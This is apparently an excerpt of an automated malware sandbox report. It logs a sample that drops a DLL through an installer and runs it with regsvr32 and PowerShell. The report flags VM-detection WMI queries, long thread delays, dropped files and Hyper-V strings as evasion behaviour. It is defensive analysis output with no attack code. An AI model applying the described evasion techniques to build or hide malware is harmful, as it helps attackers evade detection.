Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\System32\regsvr32.exeMemory allocated: 39D0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\regsvr32.exeMemory allocated: 1BC70000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 533000Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 599921Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 599812Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exeWindow / User API: threadDelayed 5316Jump to behavior
Source: C:\Windows\System32\regsvr32.exeWindow / User API: threadDelayed 4527Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6408Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3344Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7627Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1871Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7257
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2342
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_shfoldr.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\is-DOVSB.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-D8FFC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_shfoldr.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PoisedCoyote.dll (copy)Jump to dropped file
Source: C:\Windows\System32\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_16-36158
Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.4 %
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -24903104499507879s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59891s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7248Thread sleep count: 5316 > 30Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7248Thread sleep count: 4527 > 30Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59766s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59641s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59531s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59418s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59312s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59203s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59094s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -58984s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -58875s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -58766s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -58641s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -58516s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -58406s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -58296s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -58185s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -58078s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -57968s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -57859s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -57750s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -57641s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -57516s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -57391s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -57281s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -57172s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -57062s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -56950s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -56843s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -56734s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -56625s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -56516s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -56391s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -56266s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -56156s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -56047s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7692Thread sleep time: -533000s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -599921s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -599812s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59874s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59765s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59656s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59541s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59437s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59328s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59218s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59109s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -59000s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7656Thread sleep time: -58890s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep count: 6408 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep count: 3344 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep count: 7627 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep count: 1871 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5436Thread sleep count: 7257 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 736Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3736Thread sleep count: 2342 > 30
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB28C9E0 GetSystemInfo,16_2_00007FFDFB28C9E0
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 60000Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59891Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59766Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59641Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59531Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59418Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59312Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59203Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59094Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58984Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58875Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58766Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58641Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58516Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58406Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58296Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58185Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58078Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57968Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57859Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57750Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57641Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57516Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57391Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57281Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57172Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57062Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56950Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56843Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56734Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56625Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56516Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56391Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56266Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56156Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56047Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 533000Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 599921Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 599812Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59874Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59765Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59656Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59541Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59437Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59328Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59218Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59109Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59000Jump to behavior
Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58890Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000008.00000003.2088789519.000000000290A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2088977331.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.00000000038D4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2320947816.0000000002DF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: regsvr32.exe, 00000008.00000003.1795548970.0000000002746000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1801690119.0000000002746000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1802711281.0000000002746000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Re
Source: regsvr32.exe, 00000010.00000003.1993737775.0000000002C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionvity
Source: regsvr32.exe, 00000008.00000003.1795892275.00000000027A4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1807349450.00000000027A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual ProcessorJ
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor.exe
